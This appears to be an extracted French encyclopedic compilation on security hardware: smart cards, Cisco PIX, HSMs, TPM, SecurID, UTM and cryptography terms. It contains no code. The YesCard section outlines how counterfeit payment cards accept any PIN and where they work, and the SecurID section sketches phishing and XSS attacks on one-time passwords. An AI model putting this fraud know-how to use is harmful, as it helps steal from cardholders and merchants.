GIE Carte bancaire, qui a succédé au GIE Carte à mémoire, commande 16 millions de cartes CP8, lançant la généralisation de la carte à puce en France en 1992. Ce délai de dix années s'explique par un grave défaut de conception des cartes fabriquée par Bull, qui commence par livrer plusieurs millions de cartes dont le code secret est lisible avec un jouet du commerce : sur ordre des banques, toutes ces cartes (plusieurs millions) sont purement et simplement pilonnées, afin d’éviter le discrédit public de l’ensemble de cette technique. Les premières puces sécurisées apparaîtront en 1982 (logique câblée) et 1983 (microcontrôleur). En 1988, Marc Lassus crée Gemplus en France. Cette société fut jusqu'à sa fusion avec Axalto (ex Schlumberger) en juin 2006, le numéro 1 mondial de la carte à puce, ayant mis en circulation de 1980 à 2006 plus de 6,8 milliards de cartes [7]. Le leader mondial de la carte à puce est depuis Gemalto, devant Oberthur Card Systems et Giesecke & Devrient. Les banques d'Amérique du Nord attendront, elles, la fin de la période d'exclusivité pour équiper leurs clients (quid de la concurrence?) en dépit des problèmes de sécurité rencontrés.[réf. nécessaire] Carte à puce 264

Composition

La puce d'une carte typique est constituée d'un microprocesseur, le plus souvent en 8 bits et fonctionnant à une vitesse de 4 MHz, d'une mémoire morte (ROM) de taille variant entre quelques kilo-octets et plusieurs centaines de kilo-octets, d'une mémoire vive généralement très petite (256 octets dans le cas d'une carte bancaire B0', 4 096 octets

pour la carte d'identité électronique (eID) Belge), et d'une mémoire de Vue en coupe d'une carte à puce stockage de type EEPROM ou Flash.

Les composants des cartes à puce suivent l'évolution générale de l'électronique ; puissance des microprocesseurs (2005 : 32 bits à plus de 10 MHz) et capacité de mémoire (plus de 256 ko de mémoire non volatile EEPROM, 512 ko de mémoire morte), diversité des types de mémoire (mémoire flash de plusieurs Méga octets dès 2005). La puce composant peut être accessible : • par contact : l'interface entre les contacts de la puce et ceux du lecteur est le circuit imprimé doré très mince appelé micromodule. Schéma d'une carte à puce radiofréquence Il est divisé en 8 parties, chacune ayant un rôle précis permettant l'échange des données entre la puce et le lecteur. La puce est quant à elle située sous ces contacts et donc « cachée », c'est à tort que l'on désigne le micromodule comme une « puce » ; • sans contact : par radiofréquence à courte ou moyenne portée, via une antenne interne dont les spires sont moulées dans l'épaisseur de la carte ; •• par une combinaison des deux précédentes : on parle alors de cartes « combi » ou « dual interface ». Schéma d'une carte à puce à contact, avec les découpes pour les formats mini-SIM et Carte à puce et systèmes d'exploitation micro-SIM.

L’évolution technologique a amené la venue des microprocesseurs dont a bénéficié notamment la carte à puce. Cela lui a permis d’exécuter des tâches plus complexes à l’instar des ordinateurs, lui ouvrant de nouvelles perspectives applicatives et surtout une standardisation avec l'arrivée de système d'exploitation pour carte à puce.

Fonctionnement La carte à puce succède : •• aux cartes embossées ; •• aux cartes à codes barres ; •• aux cartes plastiques à pistes magnétiques. Quatre catégories de carte à puce sont référencées par le Conservatoire National des Arts & Métiers[8]. Elles se différencient par les moyens de contrôle d'accès et/ou par le mode de communication. — communication par contacts et/ou radiofréquences — contrôle d'accès par microprocesseur ou par logique câblée, celle-ci pouvant être élémentaire (moins de 50 portes)[9] ou complexe[10]. Carte à puce 265

La logique à haute intégration est mise en œuvre dans la TV payante, ainsi que dans certaines cartes RFID (multi-application, cryptographie DES, triple DES et RSA). Les cartes à microprocesseurs, largement les plus répandues de nos jours, sont : • mono-applicatives, comme les cartes bancaires B0' ou les cartes cryptographiques pour la sécurité informatique exploitant la technologie PKI[11] • multi-applicatives, comme les cartes bancaires Europay Mastercard Visa, ou les cartes SIM des téléphones mobiles.

Actuellement, les cartes à puce comportent le plus souvent un Schéma des composants d'une carte à puce microcontrôleur les rendant actives et permettant des fonctions plus élaborées, en particulier des reconnaissances de clé. Elles comportent principalement une zone mémoire, ainsi que plusieurs dispositifs de calcul destinés (entre autres) à la cryptographie. Ainsi, une fois insérées dans un lecteur, elles se comportent en fait comme un micro-ordinateur capable d'effectuer des traitements d'information. Un code confidentiel (mot de passe, en anglais Personnal Identification Number) dans la puce, par principe inaccessibles depuis l'extérieur de la carte, est garant de la personnalité, tandis que le chiffrement assure la confidentialité. Elles sont aujourd'hui particulièrement répandues dans des applications comme les cartes bancaires françaises, les cartes Vitale, mais aussi les cartes SIM (Subscriber Identity Module = Module d'identité d'abonné) utilisées dans les téléphones portables pour l'identification du propriétaire et la sauvegarde d'informations diverses (numéros de téléphone et autres). Avant d'être remise à la personne qui l'utilisera, une carte à puce est normalement 'personnalisée' électriquement (par l'organisme émetteur) via un encodeur de cartes et un programme informatique (outil de personnalisation), afin d'inscrire dans la puce les informations nécessaires à son utilisation. Par exemple, on inscrira dans une carte bancaire les références bancaires de l'utilisateur, ou dans la carte d'un contrôle d'accès, les autorisations accordées au porteur de la carte. La personnalisation physique de la carte consiste quant à elle à imprimer des donnés supplémentaires (nom de la personne, photo, etc) sur la carte, par exemple à l'aide d'une imprimante à sublimation, au-dessus d'une pré-impression offset. On peut considérer à juste titre que les clefs USB, récemment apparues, font partie de la famille des « cartes à puce », en tant qu'objets portatifs dotés d'une mémoire : mais une minorité de ces clefs intègrent une circuiterie protégeant l’accès à la mémoire, contrairement aux cartes à puce proprement dites, dont la caractéristique principale est de protéger les données qu'elles contiennent contre toute intrusion. Il existe en outre des cartes à puce fonctionnant à distance, par ondes radio. C'est le cas des cartes utilisées dans la norme NFC (ou Cityzi en France). Certaines de ces cartes fonctionnent aussi comme des cartes « classiques » — c'est-à-dire qu'on peut accéder aux données contenues dans la puce à partir d'un lecteur à contacts. Dans ce cas ces cartes sont dites mixtes. Les cartes à distance (RFID, NFC) possèdent une antenne et un convertisseur de signal associés à la puce. L'antenne perçoit le signal (alternatif) émis à distance par le terminal, et le convertisseur transforme ce signal d'une part en un courant continu qui alimente la puce, d'autre part en un courant alternatif appelé horloge qui sert à synchroniser les échanges de la puce et du terminal dans le temps. Les cartes de transport Navigo[12] sont un exemple de cartes mixtes. Carte à puce 266

Quelques utilisations • Monétique : • Carte bancaire : Groupement des Cartes Bancaires CB, nouvelles cartes EMV, etc. • Porte-monnaie électroniques : Octopus, Moneo en France, Proton en Belgique, Geldkarte en Allemagne, dont la particularité est de servir à la certification de l'âge des clients des distributeurs automatiques de cigarettes. •• Identification : •• Cartes d'identité nationales (eID en Belgique) • E-passeports (août 2006 en France) • Tous les badges d’accès à des bâtiments • Les cartes d'étudiant[13] et/ou de restauration, les cartes de lycéen •• Téléphonie mobile : •• carte SIM •• Prépaiement de télécommunications • Secteur santé (par exemple carte Vitale en France, carte SIS en Belgique) •• Titres de transport : • Passe Navigo à Paris, Oyster à Londres • SimpliCités en Lorraine (France), KorriGo en Bretagne (France), Alséo en Alsace, Carte Pastel en Midi-Pyrénées (France), Ticketreize dans les Bouches du Rhone, Carte Pass Pass dans le Nord-Pas-de-Calais • Carte OPUS au Québec • Badgéo à Strasbourg • Transpass Métropole à Marseille • Sécurité informatique (authentification forte et signature électronique). Dans ce cas la carte contient un cryptoprocesseur pour la génération des clés et le stockage de la clé privée. • Dans ce cas la technologie PKI Infrastructure à clés publiques est utilisée. • Utilisation de la carte à puce pour l'authentification forte au domaine Microsoft (Kerberos PKINIT - Smart Card Logon), applications Web (SSL), VPN • Signature de documents numérique, d'un flux de données (workflow, etc.).

Entreprises dans le domaine de la carte à puce L'industrie de la carte à puce implique différents acteurs : • les fondeurs fabriquent le hardware (les puces de silicium) • les encarteurs fabriquent la carte proprement dite en intégrant la puce de silicium dans une carte plastique • les développeurs de système d'exploitation ou d'applets conçoivent les logiciels qui s'exécutent dans la carte à puce elle-même. Enfin, les fabricants de lecteurs fournissent aux intégrateurs et développeurs d'applications le matériel nécessaire pour s'interfacer avec la carte à puce. Carte à puce 267

Marché Depuis les années 1980, le marché de la carte à puce ne cesse de progresser. En 2011, 6,3 milliards d'unités ont été produites[14]. L'essentiel de la production (75 %) est destiné au marché des télécommunications (dont les cartes SIM pour les téléphones portables), 16 % au paiement (cartes bancaires). On s'attend à une forte croissance de la technologie sans contact (et "dual interface") grâce au dynamisme de NFC. Quelques données sur le marché français (données Banque de France): • On dénombre en 2010, 88,6 millions[15] de cartes à puce à usage bancaire en France (47 millions en 2003). •• Le nombre de paiements par carte à puce a dépassé en 2001 celui des règlements par chèque. •• En 2007, 41,5 % des paiements étaient effectués par carte à puce (25,5 % par chèque). L'observatoire de la sécurité des paiements de la banque de France produit régulièrement des rapports à ce sujet.

Normes Les principaux standards en matière de carte à puce sont le fruit des travaux de l'ISO : la norme ISO/IEC 7816 (en) est découpée en 15 parties[16], et est complétée par la norme ISO/IEC 14443 (en) pour les communications sans contact. D'autres technologies apparaissent rapidement, et d'autres organismes de normalisation interviennent. Citons : • ETSI : pour les téléphones mobiles ; • EMVCo : consortium bancaire regroupant Visa, MasterCard et JCB ; • ECMA : pour la communication en champ proche (NFC), depuis normalisée par l'ISO IEC 18092[17] et IEC 21481[18]. La capacité des cartes à puce évoluant (1 Giga octet), des protocoles de communication rapides apparaissent : USB (dont USB-Inter chip) et MMC/SD. Les besoins de communication sans contact des téléphones mobiles ont pour leur part donné naissance aux protocoles SWP (Single Wire Protocol[19] et NFC-Wi[20], qui décrivent le lien entre la carte à puce (UICC (en)) et le composant chargé des communications sans contact (contactless front end, CFE).

Notes et références

[1] Les dimensions habituelles sont 85,725 × 53,975 mm (soit 3,375 × 2,125 pouces) sur une épaisseur typique de 0,76 mm (minimum : 0,69 mm, maximum : 0,84 mm) [2] …et nombre d'inventeurs divers: les Allemands Jürgen Dethloff (1924-2002) et Helmut Gröttrup, le Japonais Kunitaka Arimura, ainsi que Eyrat, Beausoleil, etc. [3] La faible capitalisation de sa société, Innovatron, ne lui permet pas de protéger l'invention dans plus de onze pays, dont USA, Japon, France, Allemagne fédérale, Italie, Suède, Belgique, Pays-Bas, Suisse. [4] L’hebdomadaire "Bulletin officiel de la propriété industrielle (BOPI)", n°30 du 29 juillet 1977, a fait connaître cette demande de brevet

d’invention déposée le 31 décembre 1975 dont le numéro de publication est 2337381. Pour les Etats-Unis n°US4216577 http:/ / www.

freepatentsonline. com/ 4216577. pdf [5] Livre intitulé « La politique industrielle française dans l’électronique» de l’historienne Chantal Le Bolloc’h-Puges docteur en Sciences Economiques, maître de conférences à l’Université de Brest. © 1991 Editions l’Harmattan, ISBN : 2-7384-1072-3 ; En page 84, s’agissant de la «carte à mémoire, carte permettant le paiement électronique» : «la DGT décida de prendre les choses en main, puis organisa la mise au point des prototypes en instaurant une collaboration entre elle et les principaux intéressés, les établissements financiers : un GIE fut constitué regroupant les PTT et dix banques françaises. Elle alla plus loin encore, en organisant la réalisation des cartes et des terminaux point de vente» [6] Article intitulé ‘France Télécom dans le capital d’Innovatron ’, hebdomadaire professionnel Electronique Actualités, 21 avril 1989. [7][7]Gemplus Schlumberger pour les cartes, Schlumberger pour les lecteurs et terminaux ainsi que le back office)

[8] Cours de Samia Bouzefrane partie (1) (http:/ / cedric. cnam. fr/ ~bouzefra/ cours/ cours_SEM/ Cartes_Bouzefrane_partie1. pdf) et partie (2)

(http:/ / cedric. cnam. fr/ ~bouzefra/ cours/ cours_SEM/ Cartes_Bouzefrane_partie2. pdf).

[9] Souvent appelées à tort "cartes à mémoire" ou encore "cartes à mémoire simple" (http:/ / www. encyclonova. com/ index. php/ Moyens_inhibiteurs) Carte à puce 268

[10] Dite aussi « intensive » ou encore « floue » (fuzzy) (http:/ / www. atmel. com/ dyn/ resources/ prod_documents/ Crypto Products Portfolio.

pdf) - - (http:/ / datasheet. eeworld. com. cn/ html/ AT50. shtm) [11] Il est néanmoins possible en utilisant le même masque que la carte B0', d'en faire une carte multi-applications, multi-fonctions. Tout cela étant du ressort des participants aux programmes. Exemple : une carte d'élève servant à la cantine scolaire, à la bibliothèque municipale et au système ramassage scolaire. [12] Originellement étudiées (avec Swatch) sous forme de montre-bracelet. [13][13]État des lieux et orientations des projets concernant les cartes à puce et autres supports d'identité dans l'Éducation Nationale et l'Enseignement Supérieur. Launay. D. JRES, 2005. [14][14]Eurosmart : General Assembly, Brussels, 25 April 2012

[15] Données Banque de France (http:/ / www. banque-france. fr/ observatoire/ telechar/

dossier-statistique-rapport-annuel-2010-observatoire-securite-cartes-paiement-0711. pdf) [16][16]Parties de l' : •• ISO-7816-1 : caractéristiques physiques de la carte ; •• ISO-7816-2 : emplacement des contacts électriques ; •• ISO-7816-3 : nature des signaux électriques et protocole de transmission entre le terminal et la carte ; •• ISO-7816-4 : organisation des données et sécurisation ; •• ISO-7816-5 : procédure d'inscription des applications ; •• ISO-7816-6 : données communes et règles de codage ; •• ISO-7816-12 : principe de fonctionnement d'une carte à puce USB.

[17] ISO/IEC 18092 (http:/ / www. iso. org/ iso/ fr/ search. htm?qt=18092& published=on& active_tab=standards), sur le site iso.org

[18] ISO/IEC 21481 (http:/ / www. iso. org/ iso/ fr/ search. htm?qt=21481& published=on& active_tab=standards), sur le site iso.org

[19] ETSI TS 102 613 (http:/ / webapp. etsi. org/ workprogram/ Frame_WorkItemList. asp?SearchPage=TRUE& qSORT=HIGHVERSION&

qINCLUDE_SUB_TB=True& butSimple=+ + Search+ + & qETSI_STANDARD_TYPE='TS'& qETSI_NUMBER=102613&

qETSI_ALL=TRUE& qMILESTONE=& qACHIEVED_DAY=& qACHIEVED_MONTH=& qACHIEVED_YEAR=&

qREPORT_TYPE=SUMMARY& optDisplay=10& qTB_ID=& includeNonActiveTB=FALSE)

[20] ECMA-373 (http:/ / www. ecma-international. org/ publications/ standards/ Ecma-373. htm), sur le site ecma-international.org

Cisco PIX

Pour les articles homonymes, voir PIX. Cisco PIX (Private Internet EXchange) est le boîtier pare-feu actuellement vendu par la société Cisco Systems.

Origines Ce pare-feu a été originellement conçu par Brantley Coile et John Mayes de la société Network Translation Inc. Cette société a été achetée en 1995 par Cisco Systems qui vend maintenant la technologie PIX et continue son développement.

Cisco FWSM Lorsque le PIX 6.3 est sorti, Cisco a aussi sorti une version haut de gamme et destinée à être insérée dans un Catalyst 6500 ou un routeur 7600: le Cisco FWSM (FireWall Service Module). Le Cisco FWSM a entre autres, des cartes d'accélération d'access-list. L'intérêt de s'insérer dans un châssis 6500/7600 est d'être connecté directement sur le fond de panier du châssis, ce qui permet d'atteindre de très hautes performances. La FWSM n'a pas de port Ethernet physique ni de port console. La connexion de la carte sur le fond de panier se fait à l'aide d'un pseudo channel à 6 giga. La carte est une entité indépendante au sein du châssis, l'accès au CLI (identique au PIX/ASA) se faisant en "sautant" sur le module depuis la carte de supervision. La configuration ne s'applique plus sur des interfaces physiques mais sur des interfaces vlan, exactement comme sur un commutateur de niveau 3. Cisco PIX 269

Cisco ASA / Cisco CSC-SSM Depuis début 2005, Cisco a lancé une gamme de boîtiers (ASA 5510, 5520 et 5540) appelée Cisco ASA pour Adaptive Security Appliance. En effet, ces boîtiers peuvent recevoir une petite carte d'extension appelée Cisco CSC-SSM (Content Security and Control Security Services Module) et capable de faire du filtrage d'URL, du filtrage de contenu, de l'anti-phishing et de l'anti-spam. Cette carte d'extension qui est un ordinateur complet fait tourner un Système d'exploitation et un IDS/IPS autonome.

Versions PIX/ASA •• pre 5.X ces versions correspondent à la période ou le PIX n'appartenait pas à Cisco. •• 5.X et 6.X ces versions font suite à une fusion au niveau syntaxe avec Cisco IOS. Par exemple, les commandes access-list se ressemblent beaucoup. • 7.X ce sont les dernières versions qui correspondent avec la sortie des boîtiers Cisco ASA contenant un binaire exactement égal à celui du PIX, mais pour un matériel beaucoup plus récent et puissant. • La flash est maintenant gérée par un File System ce qui permet de manipuler la startup-config. • La pile SSH accepte le SSH v2 et le SCP (secure copy protocol).

Versions FWSM •• FWSM 1.X ~ PIX 6.3 •• FWSM 2.X •• FWSM 3.X ~ PIX 7.X ce sont les dernières versions qui correspondent avec la réintégration du code de PIX/ASA 7.0 dans le FWSM.

Lien externe • Site Cisco.com [1] (fr)

• Portail des réseaux informatiques • Portail de la sécurité informatique

Références

[1] http:/ / www. cisco. com/ web/ go/ asa Hardware Security Module 270 Hardware Security Module

Pour les articles homonymes, voir HSM. Un Hardware Security Module HSM[1] (Module Matériel de Sécurité) est un appareil considéré comme inviolable offrant des fonctions cryptographiques. Il s'agit d'un matériel électronique offrant un service de sécurité qui consiste à générer, stocker et protéger des clefs cryptographiques. Ce matériel peut être une carte électronique enfichable PCI sur un ordinateur ou un boîtier externe SCSI/IP par exemple. Il est envisageable aussi d'obtenir ce service de manière logicielle (Software Security Module) mais un module matériel procure un plus haut niveau de sécurité[2]. Les HSMs répondent aux standards de sécurité internationaux tels que FIPS 140 (en)[3] et Critères communs EAL4+[4] et peuvent supporter des API cryptographiques majeures PKCS#11[5], CryptoAPI, et Java JCA/JCE[6]. Ils peuvent aussi être utilisé directement par des serveurs de base de données comme Oracle ou MS SQL Server[7] ("Gestion des Clefs Extensibles", an anglais EKM pour Extensible Key Management). La confiance que l'on peut accorder à une infrastructure à clé publique est basée sur l'intégrité de l'autorité de certification (AC). Le certificat de cette autorité détient la clé de signature cryptographique racine. Cette clé sert à signer les clés publiques de ceux qui vont détenir des certificats de cette autorité. Mais surtout cette clé signe sa propre clé publique. Lorsque cette clé est compromise tous les certificats signés par l'autorité de certification sont suspects et la crédibilité de l'autorité de certification détruite. D'où l'importance de protéger cette clé et son usage, les HSM répondant à cette nécessité.

L'intérêt des HSM pour une IGC L'intérêt des HSM pour une infrastructure de gestion de clés (IGC) est double : la clé privée d'une autorité de confiance (généralement l'autorité racine) est protégée de manière logicielle et matérielle. De manière matérielle le HSM est un boitier qui auto-détruit ses données en cas de manipulation physique. De manière logicielle le HSM permet la répartition du secret (la clé privée) sur plusieurs acteurs humains par le truchement de cartes à puces. Il est alors nécessaire d'avoir un quorum de personnes présentes physiquement pour activer le secret. Ceci rend impossible l'utilisation du secret par une seule personne (administrateur disposant des droits complets sur le serveur de l'autorité de confiance, porteur d'une carte volée, etc.) et donc garantit l'intégrité de l'Autorité de Certification vis-à-vis de ses Politiques de Sécurité. Un HSM peut ainsi être utilisé pour sécuriser les transactions réalisées dans de nombreux domaines d'activités. Il représente notamment une solution fonctionnelle pour sécuriser les transactions distantes opérées par un système télébillettique d'un opérateur de transport[8]. Hardware Security Module 271

Notes et références

[1] HSM (') chez Thales

[2] On trouve une argumentation HSM SSM ici (http:/ / www. cren. net/ crenca/ onepagers/ hsm2. html)

[3] FIPS PUB 140-2, Security Requirements for Cryptographic Modules (http:/ / csrc. nist. gov/ cryptval/ 140-2. htm), US National Institute of Standards and Technology (NIST), the US National Security Agency (NSA), and the Canadian Communications Security Establishment (CSE) [4][4]initiative internationale : CSE (Canada), ANSSI (France), BSI (Germany), NLNCSA (Netherlands), CESG (UK), NIST (USA) and NSA (USA).

[5] http:/ / www. rsa. com/ rsalabs/ node. asp?id=2133

[6] (http:/ / java. sun. com/ j2se/ 1. 5. 0/ docs/ guide/ security/ CryptoSpec. html)

[7] http:/ / msdn. microsoft. com/ fr-fr/ library/ bb895340. aspx

[8] On trouve un exemple de HSM utilisé pour des transactions télébillettiques ici (http:/ / www. spirtech. com/ HSM-S1usV16. pdf)

YesCard

Une YesCard est une carte bancaire donnant une autorisation de transfert ("oui" à la demande) quel que soit le « code secret » tapé par son titulaire.

Méthode de fabrication Une YesCard est une carte à puce, vierge à l'origine, dans laquelle un programme et des données spécifiques sont programmées par un pirate. Elle se comporte comme un émulateur de carte bancaire, elle simule parfaitement son fonctionnement, à la différence près qu'elle accepte n'importe quel code à 4 chiffres. La carte à puce se présente sous la forme d'une vraie carte au format carte de crédit, soit de couleur dorée en général, soit sous la forme d'un circuit imprimé de 0,8 mm d'épaisseur. Ces cartes ne peuvent s'utiliser que sur des distributeurs ne tenant compte que de la puce : pompes à essence, distributeurs de pizzas, distributeurs de DVD ou VHS en location, etc. Les pirates peuvent générer des numéros de cartes de manière aléatoire (et donc générer un numéro existant ou non). En général, si le numéro existe le nom du porteur donné par la carte est faux. De plus, lors d'une transaction, la carte doit générer un certificat de 8 octets par un calcul cryptographique DES, qui est évidemment faux avec une YesCard ; la puce utilisée ne dispose pas de la clef secrète nécessaire à ce type de calcul. Le numéro de la carte peut également être généré à partir d'une facturette, c'est pourquoi il faut toujours la récupérer après un achat ou un retrait, ou ne pas la demander.

Point de vue législatif

En France La contrefaçon et la falsification des cartes bancaires sont régies par l'article L163 du Code monétaire et financier. Art. L. 163-3 (Ordonnance n°2009-866 du 15 juillet 2009) Est puni d'un emprisonnement de sept ans et d'une amende de 750 000 euros le fait pour toute personne : 1.1.De contrefaire ou de falsifier un chèque ou un autre instrument mentionné à l'article L. 133-4 ; 2.2.De faire ou de tenter de faire usage, en connaissance de cause, d'un chèque ou un autre instrument mentionné à l'article L. 133-4 contrefaisant ou falsifié ; 3.3.D'accepter, en connaissance de cause, de recevoir un paiement au moyen d'un chèque ou d'un autre instrument mentionné à l'article L. 133-4 contrefaisant ou falsifié. Art. L. 163-4 YesCard 272

Est puni de sept ans d'emprisonnement et de 750 000 euros d'amende le fait, pour toute personne, de fabriquer, d'acquérir, de détenir, de céder, d'offrir ou de mettre à disposition des équipements, instruments, programmes informatiques ou toutes données conçus ou spécialement adaptés pour commettre les infractions prévues au 1° de l'article L. 163-3. Art. L. 163-4-1 La tentative des délits prévus au 1° de l'article L. 163-3 et à l'article L. 163-4 est punie des mêmes peines. Art. L. 163-4-2 Les peines encourues sont portées à dix ans d'emprisonnement et un million d'euros d'amende lorsque les infractions prévues aux articles L. 163-3, L. 163-4 et L. 163-4-1 sont commises en bande organisée.

Trusted Platform Module

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le Trusted Platform Module (également nommé puce TPM ou puce Fritz) est un composant cryptographique matériel, sur lequel s'appuie l'implémentation au niveau matériel du système NGSCB. Il est appelé à être intégré sur les cartes mères des ordinateurs et autres équipements électroniques et informatiques conformes aux spécifications du Trusted Computing Group.

Ce chipset est présent sur quelques modèles d'ordinateurs portables, principalement dans les gammes professionnelles. Composants internes d'un Trusted Platform Il s'agit d'un composant passif. Cela signifie qu'il ne peut pas donner Module d'ordre à l'ordinateur tel que bloquer le système ou surveiller l'exécution d'une application. Toutefois, il permet de facilement stocker des secrets (tels que des clefs de chiffrement), de manière très sécurisée.

Liens internes •• Gestion des droits numériques •• Informatique de confiance

Liens externes • Explication et bases du TPM [1] • Site français dédié au TPM et au Trusted Computing [2] (non mis à jour depuis 2006) • Explication claire en français du principe sur lequel se basent les TPM [3]

• Portail du droit • Portail de la sécurité informatique Trusted Platform Module 273

Références

[1] http:/ / cryptis. blogspot. fr/ 2013/ 03/ trusted-platform-module. html

[2] http:/ / www. protpm. fr

[3] http:/ / www. lebars. org/ sec/ tcpa-faq. fr. html

SecurID

SecurID est un système de token, ou authentifieur, produit par la société RSA Security et destiné à proposer une authentification forte à son utilisateur dans le cadre de l'accès à un système d'information.

Présentation

Il fonctionne sur le principe du mode one-time password (OTP ou « mot de passe jetable ») sur la base d'un secret partagé (seed). La majorité des tokens SecurID affichent un code à 6 chiffres (le « TokenCode ») changeant généralement toutes les minutes. Un token RSA Security SecurID modèle 700 L'utilisateur ajoute un Pin Code PIN personnel au TokenCode lu sur l'authentifieur SecurID. Le tout est appelé un PassCode (soit PassCode = PIN Code + TokenCode). Lors d'une authentification, le serveur d'authentification forte calcule le TokenCode à partir de son horloge (temps UTC) et ajoute le PIN Code de sa base de données puis compare avec celui fourni par l'utilisateur. Si le PassCode correspond, l'authentification est réussie. Il arrive que l'horloge du SecurID se désynchronise d'avec celle du serveur d'authentification. Par ailleurs, le Token expire au bout d'un certain temps (3 à 5 ans selon les modèles).

Ce système de Token, de type OTP, est utilisé pour les applications Web (par exemple le eBanking) et les technologies de type VPN (IPSEC, SSL), SSH, Citrix. En France, l'Éducation Nationale a généralisé son usage dans la population enseignante, notamment dans le cadre de Sconet (saisie des notes notamment).

Sécurité L'utilisation d'un OTP protège la solution RSA SecurID contre les attaques par rejeu : un attaquant qui aurait réussi à récupérer un OTP (par exemple à l'aide d'un keylogger) n'est pas en mesure de s'authentifier. Par ailleurs, plusieurs attaques affectant le RSA SecurID peuvent être envisagées : Exploitation de l'absence d'authentification du serveur La solution RSA SecurID n'implémente aucun mécanisme d'authentification du serveur. Un attaquant peut alors imaginer un scénario dans lequel l'utilisateur entre son OTP dans une page créée par l'attaquant, mais dont l'aspect ressemble à celui du site original. L'attaquant est ainsi en mesure de récupérer un jeton non consommé, ce qui lui permet de s'authentifier sur le site original. Pour pallier un tel scénario, il est nécessaire de réaliser une authentification du serveur. Ceci peut se faire à l'aide du protocole SSL, qui utilise un certificat numérique. Ce fichier doit être signé par une Autorité de Certification (AC) de confiance, qui garantira à l'utilisateur l'identité du serveur. Attaque s'appuyant sur une vulnérabilité de type Cross-site scripting (XSS) Une attaque plus évoluée que la précédente consisterait à exploiter une vulnérabilité de type Cross-site scripting. Une possibilité serait d'injecter un formulaire qui s'afficherait sur le navigateur de l'utilisateur. Ceci présente l'avantage que le code s'exécute sur le poste de l'utilisateur, qui est connecté sur le serveur considéré comme étant de confiance. SecurID 274

Mars 2011, le système SecurID compromis RSA a annoncé le 17 mars 2011 qu’elle a subi une cyber-attaque sophistiquée qui a permis aux attaquants d'extraire certaines informations relatives au système SecurID. Selon RSA, les informations extraites pourraient, potentiellement, être utilisées dans le cadre d'une attaque plus globale permettant de réduire l'efficacité du système SecurID. Toutefois, RSA a précisé qu’il n’est pas possible d’accomplir avec succès une attaque directe sur l’un de leurs clients utilisant ce système.

Galerie

modèle SID600 d'avant 2008 modèle SID700 modèle SID800 avec USB

Notes et références Références

• Portail de la sécurité informatique • Portail des télécommunications Unified threat management

Pour les articles homonymes, voir UTM. En sécurité informatique, Unified threat management, ou UTM (en français : gestion unifiée des menaces) est un terme inventé par Charles Kolodgy du cabinet de conseil IDC (International Data Corporation) en 2004 et utilisé pour décrire des pare-feu réseau qui possèdent de nombreuses fonctionnalités supplémentaires qui ne sont pas disponibles dans les pare-feux traditionnels.

Fonctionnalités Parmi les fonctionnalités présentes dans un UTM, outre le pare-feu traditionnel, on cite généralement le filtrage anti-spam, un logiciel antivirus, un système de détection ou de prévention d'intrusion (IDS ou IPS), et un filtrage de contenu applicatif (filtrage URL). Toutes ces fonctionnalités sont regroupés dans un même boîtier, généralement appelé appliance.

Éditeurs de solutions UTM On trouve parmi les principaux éditeurs de solutions UTM : • AhnLab : Appliance UTM 1000 • Arkoon : Appliance UTM FAST360 • Astaro : Appliance UTM Astaro • Check Point : Safe@Office, VPN-1 UTM Edge, VPN-1 UTM (Logiciel), UTM-1 • Citypassenger : Appliance MobileIT Unified threat management 275

• Cyberoam : Appliances UTM basées sur l'identité • Edenwall Technologies : EdenWall • DrayTek : VigorPro •• Endian Firewall • Fortinet : FortiGate • funkwerk : packetalarm • IBM : Proventia • InfoSet : Leading world • iWall : éditeur du système genWall •• Juniper Networks • Kerio : Kerio Control [1] •• LokTek • NetASQ : Appliance UTM NetASQ • Secure Computing Corporation : SnapGear • SonicWall : NSA E7500 •• Symantec • Untangle : Untangle Open source • WatchGuard : Firebox • Sysun Technologies : Sysun Secure • Zyxel : ZyWALL USG Des fournisseurs de services info-gérés commencent à proposer des offres basées sur ce concept.

Références

[1] http:/ / www. kerio. com/ control 276

9-Cryptographie moderne

Cryptographie

La cryptographie est une des disciplines de la cryptologie s'attachant à protéger des messages (assurant confidentialité, authenticité et intégrité) en s'aidant souvent de secrets ou clés. Elle se distingue de la stéganographie qui fait passer inaperçu un message dans un autre message alors que la cryptographie rend un message inintelligible à autre que qui-de-droit.

Elle est utilisée depuis l'Antiquité, mais certaines de ses méthodes les plus importantes, comme la cryptographie asymétrique, datent de la fin e du XX siècle. La machine de Lorenz utilisée par les Allemands durant la Seconde Guerre mondiale pour chiffrer les communications militaires de haut niveau Étymologie et vocabulaire entre le quartier-général du Führer et les quartiers-généraux des groupes d'armées Le mot cryptographie vient des mots en grec ancien kruptos (« caché ») et graphein (« écrire »). À cause de l'utilisation d'anglicismes puis de la création des chaînes de télévision dites « cryptées », une grande confusion règne concernant les différents termes de la cryptographie : • chiffrement : transformation à l'aide d'une clé d'un message en clair (dit texte clair) en un message incompréhensible (dit texte chiffré) pour celui qui ne dispose pas de la clé de déchiffrement (en anglais encryption key ou private key pour la cryptographie asymétrique) ; • chiffre : utilisation de la substitution au niveau des lettres pour coder[1] ; • code : utilisation de la substitution au niveau des mots ou des phrases pour coder[1] ; • coder : action réalisée sur un texte lorsqu'on remplace un mot ou une phrase par un autre mot, un nombre ou un symbole[1] ; •• cryptogramme : message chiffré ; •• cryptosystème : algorithme de chiffrement; • décrypter : retrouver le message clair correspondant à un message chiffré sans posséder la clé de déchiffrement (terme que ne possèdent pas les anglophones, qui eux « cassent » des codes secrets)[2] ; •• cryptographie : étymologiquement « écriture secrète », devenue par extension l'étude de cet art (donc aujourd'hui la science visant à créer des cryptogrammes, c'est-à-dire à chiffrer) ; •• cryptanalyse : science analysant les cryptogrammes en vue de les décrypter ; •• cryptologie : science regroupant la cryptographie et la cryptanalyse. •• cryptolecte : jargon réservé à un groupe restreint de personnes désirant dissimuler leur communication. Il apparaît donc que mis au regard du couple chiffrer/déchiffrer et du sens du mot « décrypter », le terme « crypter » n'a pas de raison d'être (l'Académie française précise que le mot est à bannir), en tout cas pas dans le sens où on le trouve en général utilisé[réf. nécessaire]. Dans sa dernière édition (entamée en 1992) le Dictionnaire de l'Académie française n'intègre pas « crypter » et « cryptage », mais ce dernier terme apparait dans le Grand Robert (qui date son apparition de 1980). L'Office québécois de la langue française intègre « crypter » au sens de « chiffrer », et « cryptage » au sens de déchiffrement dans son grand dictionnaire terminologique[3]. Cryptographie 277

